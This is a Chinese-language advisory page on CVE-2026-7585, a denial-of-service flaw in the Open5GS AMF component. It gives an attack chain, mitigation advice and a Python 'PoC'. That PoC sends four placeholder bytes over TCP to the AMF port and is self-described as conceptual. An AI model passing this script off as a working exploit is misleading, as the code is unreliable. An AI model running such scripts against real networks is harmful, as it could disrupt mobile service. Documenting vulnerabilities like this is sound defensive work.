CVE-2026-7585 CVSS 4.3 中危

CVE-2026-7585 Open5GS 拒绝服务漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7585

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS 是一个开源的 5G 核心网实现。CVE-2026-7585 存在于 Open5GS 最高至 2.7.7 版本中。该漏洞位于 AMF 组件的 `amf_nudm_sdm_handle_provisioned` 函数内，由于对特定请求处理不当，远程攻击者可利用此漏洞触发拒绝服务。目前利用细节已公开，厂商尚未修复。

技术细节

该漏洞源于 Open5GS 访问和移动性管理功能（AMF）组件在处理统一数据管理（UDM）相关消息时的逻辑缺陷。具体受影响的代码文件为 `/src/amf/nudm-handler.c` 中的 `amf_nudm_sdm_handle_provisioned` 函数。攻击者无需用户交互，仅需低权限即可通过网络发起攻击。通过发送特制的恶意数据包，攻击者可导致该函数处理异常，进而耗尽系统资源或导致进程崩溃。CVSS 3.1 评分为 4.3，主要影响可用性（A:L），对机密性和完整性无影响。鉴于 5G 核心网的重要性，该 DoS 漏洞可能导致网络服务中断。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的 Open5GS AMF 组件接口。

STEP 2

武器化

攻击者构造针对 `amf_nudm_sdm_handle_provisioned` 函数的特定恶意数据包。

STEP 3

传递

通过网络向目标 AMF 服务发送恶意数据包。

STEP 4

利用

目标系统处理数据包时触发漏洞，导致处理逻辑异常。

STEP 5

影响

AMF 进程崩溃或停止响应，造成 5G 核心网拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-7585 (Open5GS DoS)
# This script is a conceptual demonstration.
# It sends a malformed packet to the AMF NUDM interface.

import socket
import struct

def send_exploit(target_ip, target_port):
    try:
        # Create a TCP socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        
        # Construct a malicious payload targeting the vulnerable function
        # In a real scenario, this would be a specific NGAP or NAS message
        # triggering the nudm-handler issue.
        payload = b"\x00\x00\x00\x01" # Example trigger bytes
        
        print(f"[*] Sending exploit payload to {target_ip}:{target_port}")
        s.send(payload)
        
        # Wait for response or crash
        response = s.recv(1024)
        print("[+] Server responded (might not crash immediately)")
        
    except Exception as e:
        print(f"[-] Exploit triggered or connection error: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    # Replace with actual target AMF address
    target = "127.0.0.1"
    port = 38412 # Example SCTP/HTTP port for Open5GS AMF
    send_exploit(target, port)

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

在官方补丁发布前，建议通过防火墙策略严格限制访问 Open5GS AMF 组件的源 IP 地址，仅允许可信的基站设备接入。同时，管理员应增强对 AMF 服务运行状态的监控，配置自动重启机制以减少服务中断时间。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7585
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7585
3 Details https://www.cvedetails.com/cve/CVE-2026-7585/
4 VulDB https://vuldb.com/cve/CVE-2026-7585
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4403
7 Link https://vuldb.com/submit/804334
8 Link https://vuldb.com/submit/804335
9 Link https://vuldb.com/submit/804337
10 Link https://vuldb.com/vuln/360533
11 Link https://vuldb.com/vuln/360533/cti
12 Link https://vuldb.com/submit/804334
13 Link https://vuldb.com/submit/804335
14 Link https://vuldb.com/submit/804337

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表